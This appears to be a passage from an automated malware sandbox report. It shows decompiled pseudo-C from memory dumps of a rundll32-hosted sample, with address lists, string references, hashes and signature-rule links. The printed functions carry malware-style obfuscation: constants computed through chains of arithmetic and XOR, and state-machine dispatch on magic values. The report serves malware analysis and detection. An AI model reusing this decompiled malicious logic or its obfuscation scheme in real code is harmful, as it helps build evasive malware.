				E00205891(_t250,  &_v1164, _v76, _v28, _v16);
				_v120 = _v72;
				_v116 =  &_v644;
				_v112 =  &_v1164;
				_v108 = _v68 | _v36;
				_t212 = E0020C9E4(_v60, _v20,  &_v124);
				asm("sbb eax, eax");
				return  ~_t212 + 1;
			}

0x00203d87
0x00203d8a
0x00203d8c
0x00203d8f
0x00203d92
0x00203d94
0x00203d99
0x00203d9f
0x00203da3
0x00203daa
0x00203db1
0x00203db8
0x00203dbf
0x00203dc6
0x00203dcd
0x00203dd4
0x00203ddb
0x00203de2
0x00203de9
0x00203df0
0x00203df7
0x00203dfe
0x00203e05
0x00203e08
0x00203e0f
0x00203e16
0x00203e1d
0x00203e29
0x00203e2e
0x00203e33
0x00203e3a
0x00203e44
0x00203e49
0x00203e51
0x00203e56
0x00203e5b
0x00203e62
0x00203e69
0x00203e74
0x00203e75
0x00203e78
0x00203e7f
0x00203e86
0x00203e8d
0x00203e94
0x00203e9b
0x00203ea2
0x00203ea6
0x00203ead
0x00203eb4
0x00203eb8
0x00203ebf
0x00203ec6
0x00203ecd
0x00203ed1
0x00203ed5
0x00203edc
0x00203ee3
0x00203ee7
0x00203eeb
0x00203ef2
0x00203efe
0x00203f03
0x00203f0a
0x00203f11
0x00203f1e
0x00203f21
0x00203f24
0x00203f2b
0x00203f32
0x00203f39
0x00203f3d
0x00203f44
0x00203f4b
0x00203f52
0x00203f59
0x00203f60
0x00203f67
0x00203f73
0x00203f74
0x00203f79
0x00203f80
0x00203f87
0x00203f96
0x00203f99
0x00203fa8
0x00203fbf
0x00203fd1
0x00203fe8
0x00203ffe
0x00204009
0x00204012
0x0020401b
0x00204024
0x00204035
0x0020403e
0x00204046

Strings

z@L}, xrefs: 00203F44

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: z@L}
API String ID: 0-656678828
Opcode ID: 60fa0d3e1590c9607e5d51dbb1653ade0f49e62c408987f7d99e6032664efbe8
Instruction ID: b0e6476cda00ba035667b5e55154a7eb9845f4c5debd7abc9622e637a77a4b88
Opcode Fuzzy Hash: 60fa0d3e1590c9607e5d51dbb1653ade0f49e62c408987f7d99e6032664efbe8
Instruction Fuzzy Hash: E88100B2D0130DEBEF14CFA1D98A9DEBBB2FB44314F208159E415B6290D7B91A4ACF54

Uniqueness

Uniqueness Score: -1.00%

Function 002A32F0, Relevance: 1.4, Strings: 1, Instructions: 171COMMON

Download Yara Rule

Strings

z@L}, xrefs: 002A34B8

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: z@L}
API String ID: 0-656678828
Opcode ID: 8ba432bf509e8b050dddf1a9d40518d0653bca8700a80e3e7ee81c1c2011f087
Instruction ID: 098e5dc5fabd0d5c19eff5c973bfc69bf044e3ccf60e81044e7bd027916b8efb
Opcode Fuzzy Hash: 8ba432bf509e8b050dddf1a9d40518d0653bca8700a80e3e7ee81c1c2011f087
Instruction Fuzzy Hash: 59812072D0020DEBEF18CFA1D98A9DEBBB2FB44314F208159E415B6290D7B91A5ACF54

Uniqueness

Uniqueness Score: -1.00%

Function 00208831, Relevance: 1.4, Strings: 1, Instructions: 136
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00208831(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v52;
				char _v60;
				intOrPtr _v64;
				void* _v68;
				char _v120;
				void* _t100;
				void* _t113;
				void* _t117;
				void* _t119;
				void* _t121;
				void* _t123;
				void* _t125;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				void* _t161;
				void* _t163;
				void* _t165;
				void* _t166;

				_t166 = __eflags;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001F56B2(_t100);
				_v40 = 0xa9e3;
				_v40 = _v40 | 0x2174341f;
				_v40 = _v40 ^ 0x2174d138;
				_t161 = 0;
				_v28 = 0xd1b7;
				_v28 = _v28 >> 6;
				_v28 = _v28 >> 0xa;
				_v28 = _v28 ^ 0x0000747d;
				_v24 = 0x8bdd;
				_t131 = 0x3c;
				_v24 = _v24 / _t131;
				_v24 = _v24 >> 5;
				_v24 = _v24 ^ 0x00001716;
				_v20 = 0xbd7b;
				_t132 = 0x56;
				_v20 = _v20 * 0x24;
				_v20 = _v20 << 1;
				_v20 = _v20 ^ 0x00355362;
				_v12 = 0x1776;
				_t133 = 0x74;
				_v12 = _v12 / _t132;
				_v12 = _v12 + 0xffffd771;
				_v12 = _v12 * 0x66;
				_v12 = _v12 ^ 0xffefd8ce;
				_v36 = 0xe780;
				_v36 = _v36 + 0xffff8307;
				_v36 = _v36 ^ 0x00001dc1;
				_v32 = 0x334f;
				_v32 = _v32 << 9;
				_v32 = _v32 ^ 0x0066d4a3;
				_v44 = 0xfc2;
				_v44 = _v44 + 0xffff2eb0;
				_v44 = _v44 ^ 0xffff18b3;
				_v16 = 0xf408;
				_v16 = _v16 + 0xffff10d6;
				_v16 = _v16 << 0xf;
				_v16 = _v16 / _t133;
				_v16 = _v16 ^ 0x000527d6;
				E0020F3E9(_v40, _v28, _v24, __edx,  &_v120);
				_t165 = _t163 + 0x18;
				L15:
				_t113 = E001F9899( &_v52, _v20, _t166,  &_v120, _v12, _v36, _v32);
				_t165 = _t165 + 0x10;
				if(_t113 != 0) {
					__eflags = E0020C04C( &_v68, _v44,  &_v52, _v16);
					if(__eflags != 0) {
						_t117 = _v64 - 1;
						__eflags = _t117;
						if(_t117 == 0) {
							E002077C0(_v68,  &_v60);
						} else {
							_t119 = _t117 - 1;
							__eflags = _t119;
							if(_t119 == 0) {
								E001F7E34(_v68,  &_v60);
							} else {
								_t121 = _t119 - 1;
								__eflags = _t121;
								if(_t121 == 0) {
									E001F3D4E(_v68,  &_v60);
								} else {
									_t123 = _t121 - 1;
									__eflags = _t123;
									if(_t123 == 0) {
										E00202965(_v68,  &_v60);
									} else {
										_t125 = _t123 - 6;
										__eflags = _t125;
										if(_t125 == 0) {
											E001F1658(_v68,  &_v60);
										} else {
											__eflags = _t125 == 1;
											if(_t125 == 1) {
												E001F2DEE(_v68,  &_v60);
											}
										}
									}
								}
							}
						}
						_t161 = _t161 + 1;
						__eflags = _t161;
					}
					goto L15;
				}
				return _t161;
			}

0x00208831
0x00208839
0x0020883e
0x0020883f
0x00208840
0x00208845
0x0020884f
0x00208858
0x0020885f
0x00208861
0x00208868
0x0020886c
0x00208870
0x00208877
0x00208883
0x00208888
0x0020888d
0x00208891
0x00208898
0x002088a3
0x002088a6
0x002088a9
0x002088ac
0x002088b3
0x002088bf
0x002088c0
0x002088c5
0x002088d0
0x002088d3
0x002088da
0x002088e1
0x002088e8
0x002088ef
0x002088f6
0x002088fa
0x00208901
0x00208908
0x0020890f
0x00208916
0x0020891d
0x00208924
0x0020892d
0x00208933
0x00208945
0x0020894a
0x002089cb
0x002089de
0x002089e3
0x002089e8
0x00208963
0x00208965
0x0020896a
0x0020896a
0x0020896b
0x002089c5
0x0020896d
0x0020896d
0x0020896d
0x0020896e
0x002089b8
0x00208970
0x00208970
0x00208970
0x00208971
0x002089ab
0x00208973
0x00208973
0x00208973
0x00208974
0x0020899e
0x00208976
0x00208976
0x00208976
0x00208979
0x00208991
0x0020897b
0x0020897b
0x0020897c
0x00208984
0x00208984
0x0020897c
0x00208979
0x00208974
0x00208971
0x0020896e
0x002089ca
0x002089ca
0x002089ca
0x00000000
0x00208965
0x002089f5

Strings

bS5, xrefs: 002088AC

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: bS5
API String ID: 0-1932987624
Opcode ID: 60c0db7c199690b9a4269612a9ff3c2463bdb260329f2ae53de997cd560263d1
Instruction ID: 112fadc0e2f60b7bc12bdc01889b7e3676b791a949cf2d5d925411598553b3ab
Opcode Fuzzy Hash: 60c0db7c199690b9a4269612a9ff3c2463bdb260329f2ae53de997cd560263d1
Instruction Fuzzy Hash: 03515771D1021EDBDF08EFA1C94A8EEBBB1FF40314F208119E141B6291EBB51A16CF91

Uniqueness

Uniqueness Score: -1.00%

Function 002A7DA5, Relevance: 1.4, Strings: 1, Instructions: 136COMMON

Download Yara Rule

Strings

bS5, xrefs: 002A7E20

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: bS5
API String ID: 0-1932987624
Opcode ID: 33fe778222377f99b5f17565a48562c82866b8c3a147bf64a396045678ccba05
Instruction ID: 3bf97ad83e36eae1d2140b7b0816de47a67c66f6e2b42f89eca157786309c23d
Opcode Fuzzy Hash: 33fe778222377f99b5f17565a48562c82866b8c3a147bf64a396045678ccba05
Instruction Fuzzy Hash: 5E514771D2420EDBDF14DFA0C98A8EEBBB1FF41304F208159E411B6294EBB85A16CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0020B1D2, Relevance: 1.4, Strings: 1, Instructions: 132
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0020B1D2() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t110;
				intOrPtr _t111;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				intOrPtr* _t121;
				void* _t123;
				void* _t134;
				signed int* _t136;

				_t136 =  &_v40;
				_v40 = 0x70f8;
				_v40 = _v40 >> 7;
				_v40 = _v40 + 0xffff630a;
				_t118 = 0x64;
				_v40 = _v40 / _t118;
				_v40 = _v40 ^ 0x028f2fd3;
				_t134 = 0x35b1160f;
				_v16 = 0x47d6;
				_v16 = _v16 ^ 0xd8da0719;
				_v16 = _v16 >> 1;
				_v16 = _v16 ^ 0x6c6d66b3;
				_v36 = 0xc09c;
				_t119 = 0x42;
				_v36 = _v36 / _t119;
				_v36 = _v36 | 0x4c951b1c;
				_t120 = 0x76;
				_v36 = _v36 / _t120;
				_v36 = _v36 ^ 0x00a646bb;
				_v4 = 0xd906;
				_v4 = _v4 + 0xffffa865;
				_v4 = _v4 ^ 0x0000cebc;
				_v12 = 0x1924;
				_v12 = _v12 << 0xa;
				_v12 = _v12 ^ 0x5770cda5;
				_v12 = _v12 ^ 0x57146551;
				_v20 = 0x57d8;
				_v20 = _v20 + 0x3c9b;
				_v20 = _v20 | 0x6624950d;
				_v20 = _v20 + 0x7d86;
				_v20 = _v20 ^ 0x662576da;
				_v24 = 0x7f33;
				_v24 = _v24 + 0x8e9f;
				_v24 = _v24 * 0x52;
				_v24 = _v24 * 0x41;
				_v24 = _v24 ^ 0x15f1c515;
				_v8 = 0xdf1f;
				_v8 = _v8 ^ 0x9b779287;
				_v8 = _v8 << 4;
				_v8 = _v8 ^ 0xb774c662;
				_v28 = 0x1b91;
				_v28 = _v28 ^ 0xac548ac7;
				_v28 = _v28 * 0x57;
				_v28 = _v28 + 0xffff181d;
				_v28 = _v28 ^ 0x90bc1e59;
				_v32 = 0x7551;
				_v32 = _v32 >> 0xb;
				_v32 = _v32 ^ 0xb8e7ca91;
				_v32 = _v32 * 0x76;
				_v32 = _v32 ^ 0x3ad707f4;
				_t121 =  *0x211404; // 0x0
				while(_t134 != 0x472a097) {
					if(_t134 == 0x148a4b2c) {
						_t111 = E0020D1E3(_v36, _t121, _v4, _t121, _t121, _v12);
						_t121 =  *0x211404; // 0x0
						_t136 =  &(_t136[5]);
						_t134 = 0x472a097;
						 *_t121 = _t111;
						continue;
					} else {
						if(_t134 != 0x35b1160f) {
							L8:
							if(_t134 != 0xfe78997) {
								continue;
							}
						} else {
							_push(_t121);
							_t123 = 0x18;
							_t121 = E002057E8(_t123);
							 *0x211404 = _t121;
							if(_t121 != 0) {
								_t134 = 0x148a4b2c;
								continue;
							}
						}
					}
					return 0 | _t121 != 0x00000000;
				}
				_t110 = E001FD6D8(_v20, _v24, _t121, E00206B45, _v8, _t121, 0, _t121, _t121, _v28, _v32);
				_t121 =  *0x211404; // 0x0
				_t136 =  &(_t136[9]);
				_t134 = 0xfe78997;
				 *((intOrPtr*)(_t121 + 0x14)) = _t110;
				goto L8;
			}

0x0020b1d2
0x0020b1d5
0x0020b1de
0x0020b1e2
0x0020b1f2
0x0020b1f7
0x0020b1fd
0x0020b205
0x0020b20a
0x0020b217
0x0020b224
0x0020b22d
0x0020b235
0x0020b241
0x0020b246
0x0020b24c
0x0020b258
0x0020b25b
0x0020b25f
0x0020b267
0x0020b26f
0x0020b277
0x0020b27f
0x0020b287
0x0020b28c
0x0020b294
0x0020b29c
0x0020b2a4
0x0020b2ac
0x0020b2b4
0x0020b2bc
0x0020b2c4
0x0020b2cc
0x0020b2d9
0x0020b2e2
0x0020b2e6
0x0020b2ee
0x0020b2f6
0x0020b2fe
0x0020b303
0x0020b30b
0x0020b313
0x0020b320
0x0020b324
0x0020b32c
0x0020b334
0x0020b33c
0x0020b341
0x0020b34e
0x0020b352
0x0020b35a
0x0020b360
0x0020b366
0x0020b3a1
0x0020b3a6
0x0020b3ac
0x0020b3af
0x0020b3b1
0x00000000
0x0020b368
0x0020b36e
0x0020b3e7
0x0020b3e9
0x00000000
0x00000000
0x0020b370
0x0020b378
0x0020b37b
0x0020b382
0x0020b384
0x0020b38c
0x0020b38e
0x00000000
0x0020b38e
0x0020b38c
0x0020b36e
0x0020b3fd
0x0020b3fd
0x0020b3d4
0x0020b3d9
0x0020b3df
0x0020b3e2
0x0020b3e4
0x00000000

Strings

Qu, xrefs: 0020B334

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Qu
API String ID: 0-3256286041
Opcode ID: d4eada8e9f2058958e5aaca1815dbcae4a156d1f17bb6b12dd688c871e2233e7
Instruction ID: d3644b29cd9336adb63da65fc14d3780b506cc71642b7853cb4b7fa2471348ee
Opcode Fuzzy Hash: d4eada8e9f2058958e5aaca1815dbcae4a156d1f17bb6b12dd688c871e2233e7
Instruction Fuzzy Hash: 6A51BC72508302DFD318CF25D48A91BBBE1FB98718F108A1CF485A62A1D7B5DA15CF86

Uniqueness

Uniqueness Score: -1.00%

Function 002AA746, Relevance: 1.4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

Qu, xrefs: 002AA8A8

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Qu
API String ID: 0-3256286041
Opcode ID: fb2d92d06aeded7cd5f2100e18f12758fae792be73cb6822ceda48e8209a461b
Instruction ID: d7ee80037f09af27169976396c7441ee3ac763fad56f51a7e2b0304800a8aba4
Opcode Fuzzy Hash: fb2d92d06aeded7cd5f2100e18f12758fae792be73cb6822ceda48e8209a461b
Instruction Fuzzy Hash: 74519A724083029FD308DF25C88690BBBE0FF88718F114A1CF589A62A0D7B5DA56CF87

Uniqueness

Uniqueness Score: -1.00%

Function 00208668, Relevance: 1.4, Strings: 1, Instructions: 124
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E00208668(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void* _t124;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				signed int _t174;
				signed int _t175;
				void* _t179;

				_t179 = __eflags;
				_t174 = _a8;
				_push(_t174);
				_push(_a4);
				_push(__ecx);
				E001F56B2(_t124);
				_v48 = _v48 & 0x00000000;
				_v60 = 0x2b6426;
				_v56 = 0x6e5114;
				_v52 = 0x76edce;
				_v28 = 0x79ec;
				_t153 = 0x78;
				_v28 = _v28 / _t153;
				_v28 = _v28 ^ 0x0000650d;
				_a8 = 0xe566;
				_a8 = _a8 + 0x6996;
				_t154 = 0x28;
				_a8 = _a8 * 0x2c;
				_a8 = _a8 << 6;
				_a8 = _a8 ^ 0x0e64e211;
				_v16 = 0x462c;
				_v16 = _v16 * 0x2a;
				_v16 = _v16 * 0x1a;
				_v16 = _v16 ^ 0x012b18fd;
				_v8 = 0x3be2;
				_v8 = _v8 ^ 0xc0b2cfc2;
				_v8 = _v8 + 0xffff8202;
				_v8 = _v8 + 0xffff281a;
				_v8 = _v8 ^ 0xc0b1e356;
				_v32 = 0xe529;
				_v32 = _v32 | 0xad89a33e;
				_v32 = _v32 ^ 0xad89e9bc;
				_v12 = 0xc860;
				_v12 = _v12 / _t154;
				_v12 = _v12 << 8;
				_v12 = _v12 ^ 0x00050c31;
				_v24 = 0x828e;
				_v24 = _v24 >> 0xe;
				_v24 = _v24 >> 0xa;
				_v24 = _v24 ^ 0x00005687;
				_v20 = 0xf702;
				_v20 = _v20 << 5;
				_t155 = 0x19;
				_v20 = _v20 / _t155;
				_v20 = _v20 ^ 0x000138d2;
				_v40 = 0x21c7;
				_t156 = 0x48;
				_v40 = _v40 / _t156;
				_v40 = _v40 ^ 0x00003778;
				_v36 = 0x7572;
				_t157 = 0x45;
				_v36 = _v36 / _t157;
				_v36 = _v36 ^ 0x00006456;
				_v44 = E00207B6B();
				_a8 = 0x4920;
				_t158 = 0x7e;
				_a8 = _a8 / _t158;
				_a8 = _a8 ^ 0x00000090;
				_v28 = 0x69c4;
				_v28 = _v28 >> 2;
				_v28 = _v28 ^ 0x00001a61;
				_t175 = E001F607F(_t158, _t179, _t158, _v28, _a8);
				E001FD940(_t174, _v20, _v40, _v36, 1,  &_v44, _t175);
				 *((short*)(_t174 + _t175 * 2)) = 0;
				return 0;
			}

0x00208668
0x00208670
0x00208673
0x00208674
0x00208678
0x00208679
0x0020867e
0x00208684
0x0020868b
0x00208692
0x00208699
0x002086a5
0x002086aa
0x002086af
0x002086b6
0x002086bd
0x002086c8
0x002086cb
0x002086ce
0x002086d2
0x002086d9
0x002086e4
0x002086eb
0x002086ee
0x002086f5
0x002086fc
0x00208703
0x0020870a
0x00208711
0x00208718
0x0020871f
0x00208726
0x0020872d
0x0020873b
0x0020873e
0x00208742
0x00208749
0x00208750
0x00208754
0x00208758
0x0020875f
0x00208766
0x0020876d
0x00208772
0x00208777
0x0020877e
0x00208788
0x0020878d
0x00208792
0x00208799
0x002087a3
0x002087a6
0x002087a9
0x002087bb
0x002087c0
0x002087cc
0x002087d2
0x002087d5
0x002087dc
0x002087e3
0x002087e7
0x00208806
0x0020881d
0x00208827
0x00208830

Strings

&d+, xrefs: 00208684

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &d+
API String ID: 0-1856812195
Opcode ID: 930e4a88b72f900f157fc4a04b76e2da3c06cc500f2b69401a2902ce23c90efd
Instruction ID: cf9f4a395e811e65566e02773dd29016bb2137bc86ccb4f7707899041a84ed52
Opcode Fuzzy Hash: 930e4a88b72f900f157fc4a04b76e2da3c06cc500f2b69401a2902ce23c90efd
Instruction Fuzzy Hash: 2651F6B1D0020DABDF08CFA5D94A9EEBBB6FF44314F10C059E514AB290D7B99A54CF94

Uniqueness

Uniqueness Score: -1.00%

Function 002A7BDC, Relevance: 1.4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

&d+, xrefs: 002A7BF8

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &d+
API String ID: 0-1856812195
Opcode ID: d92524d83bba303f9c7abbb732e90c85f4f1078af566599b94027ec1197744b2
Instruction ID: 3aa02d9564084b4c6a0265d1dd2da52fd512e9271d154d1f7f9df9b1bd8651e7
Opcode Fuzzy Hash: d92524d83bba303f9c7abbb732e90c85f4f1078af566599b94027ec1197744b2
Instruction Fuzzy Hash: 615106B1D00209AFDF08CFA5D94A9EEBBB6FF44314F10C059E914AB290D7B99A54CF94

Uniqueness

Uniqueness Score: -1.00%

Function 001FD44C, Relevance: 1.4, Strings: 1, Instructions: 122
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E001FD44C(void* __ecx, void* __edx, void* __eflags, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				void* _t130;
				void* _t135;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				void* _t158;

				_t135 = __ecx;
				_push(_a16);
				_push(_a12);
				_v52 = 0x104;
				_push(_a8);
				_push(0x104);
				_push(__edx);
				_push(__ecx);
				E001F56B2(0x104);
				_v8 = 0xbcd1;
				_t158 = 0;
				_t152 = 0x36;
				_v8 = _v8 * 0x2e;
				_v8 = _v8 / _t152;
				_v8 = _v8 ^ 0x7bcd9522;
				_v8 = _v8 ^ 0x7bcd7ef1;
				_v20 = 0xd074;
				_t153 = 0x7c;
				_v20 = _v20 / _t153;
				_t154 = 7;
				_v20 = _v20 / _t154;
				_v20 = _v20 ^ 0x00001e29;
				_v32 = 0xd525;
				_v32 = _v32 << 0xf;
				_t155 = 0x6c;
				_v32 = _v32 / _t155;
				_v32 = _v32 ^ 0x00fcbc52;
				_v28 = 0x5229;
				_v28 = _v28 | 0x68e90e22;
				_v28 = _v28 << 8;
				_v28 = _v28 ^ 0xe95e5e4c;
				_v24 = 0xbbdc;
				_v24 = _v24 + 0xffff5b85;
				_t156 = 0x2b;
				_v24 = _v24 * 0x5a;
				_v24 = _v24 ^ 0x000800d6;
				_v12 = 0x4595;
				_v12 = _v12 | 0x5bffd677;
				_v12 = _v12 + 0xffff91eb;
				_v12 = _v12 ^ 0x5bff1f9a;
				_v48 = 0x86a3;
				_v48 = _v48 | 0x766d4cfb;
				_v48 = _v48 ^ 0x766ddf16;
				_v36 = 0x4caf;
				_v36 = _v36 | 0x279090db;
				_v36 = _v36 + 0xdfe5;
				_v36 = _v36 ^ 0x2791e7d1;
				_v44 = 0x2a6e;
				_v44 = _v44 + 0xffff210b;
				_v44 = _v44 ^ 0xffff72fc;
				_v16 = 0x7a4e;
				_v16 = _v16 / _t156;
				_v16 = _v16 << 7;
				_v16 = _v16 * 0x64;
				_v16 = _v16 ^ 0x008e4fe7;
				_v40 = 0x3228;
				_v40 = _v40 >> 0xd;
				_v40 = _v40 ^ 0x00001001;
				_t130 = E001F3B31(__ecx, __ecx, __ecx, _v40);
				_t157 = _t130;
				if(_t130 != 0) {
					_push(_t135);
					_t158 = E001FC62B(_a8, _v32, _v28, _t157, _v24,  &_v52, _v12);
					E001F78F0(_t157, _v48, _v36, _v44, _v16);
				}
				return _t158;
			}

0x001fd44c
0x001fd454
0x001fd45c
0x001fd45f
0x001fd462
0x001fd465
0x001fd466
0x001fd467
0x001fd468
0x001fd46d
0x001fd47d
0x001fd481
0x001fd482
0x001fd48c
0x001fd491
0x001fd498
0x001fd49f
0x001fd4a9
0x001fd4ae
0x001fd4b6
0x001fd4bb
0x001fd4c0
0x001fd4c7
0x001fd4ce
0x001fd4d5
0x001fd4da
0x001fd4df
0x001fd4e6
0x001fd4ed
0x001fd4f4
0x001fd4f8
0x001fd4ff
0x001fd506
0x001fd511
0x001fd512
0x001fd515
0x001fd51c
0x001fd523
0x001fd52a
0x001fd531
0x001fd538
0x001fd53f
0x001fd546
0x001fd54d
0x001fd554
0x001fd55b
0x001fd562
0x001fd569
0x001fd570
0x001fd577
0x001fd57e
0x001fd58a
0x001fd58d
0x001fd595
0x001fd598
0x001fd59f
0x001fd5a8
0x001fd5ac
0x001fd5be
0x001fd5c3
0x001fd5ca
0x001fd5cc
0x001fd5eb
0x001fd5f6
0x001fd5fb
0x001fd605

Strings

L^^, xrefs: 001FD4F8

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: L^^
API String ID: 0-295340116
Opcode ID: fa22bd86a460830a331d50a2ba865589b89019c83ade8a281ebc60d719fb16f5
Instruction ID: f4b2f1a859fda13abfaaa721748246e13795fbc41e5ec051e006912e97e0ed49
Opcode Fuzzy Hash: fa22bd86a460830a331d50a2ba865589b89019c83ade8a281ebc60d719fb16f5
Instruction Fuzzy Hash: 99512671D0020DEBDF04CFAAD94A8EEFBB6FB84314F248159E911BA260D3B94A55CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0029C9C0, Relevance: 1.4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

Strings

L^^, xrefs: 0029CA6C

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: L^^
API String ID: 0-295340116
Opcode ID: 19f06c700d6547939b5c0ae39013d9a606531ad4cc7258dbe3aa346db41a5130
Instruction ID: 37646d719f55cb722570c713d727fc833509ddd6e0237631c69ca11016befaa1
Opcode Fuzzy Hash: 19f06c700d6547939b5c0ae39013d9a606531ad4cc7258dbe3aa346db41a5130
Instruction Fuzzy Hash: F55137B1D00209EBDF04CFEAD94A8EEFBB5FB84314F208159E911B6260D3B94A55CF64

Uniqueness

Uniqueness Score: -1.00%

Function 002A10BB, Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

AM, xrefs: 002A11FF

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: AM
API String ID: 0-2698400150
Opcode ID: 7718a1623d28e13e9c28a2ceadde1dcd286c794765cd61194c99f1db5173657d
Instruction ID: 9e29e696ac6959fb5da6c6064935319bfe8e9b28bfeb86018b8042520538890c
Opcode Fuzzy Hash: 7718a1623d28e13e9c28a2ceadde1dcd286c794765cd61194c99f1db5173657d
Instruction Fuzzy Hash: DD41F4B04083829FC758CF25C18A01FBBF0BBD5358F505A5EF0D68A6A1D3B8C6588F86

Uniqueness

Uniqueness Score: -1.00%

Function 001FCF11, Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

K\n, xrefs: 001FCF4D

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: K\n
API String ID: 0-1066067252
Opcode ID: 614d4f8e7af9738af21326600059ab1553da787936aae5bf2c44cd3194645b37
Instruction ID: dacb27c5947662fb50f44545b7c33b6450d5b72691c9fd6e2339d53a55d98942
Opcode Fuzzy Hash: 614d4f8e7af9738af21326600059ab1553da787936aae5bf2c44cd3194645b37
Instruction Fuzzy Hash: 6E310576D0020CFBDF05CFE5C8898DEBBB2FB48318F108199EA18A6250D3B55A65DF80

Uniqueness

Uniqueness Score: -1.00%

Function 001FA83A, Relevance: .2, Instructions: 209
COMMONCrypto

Download Yara Rule

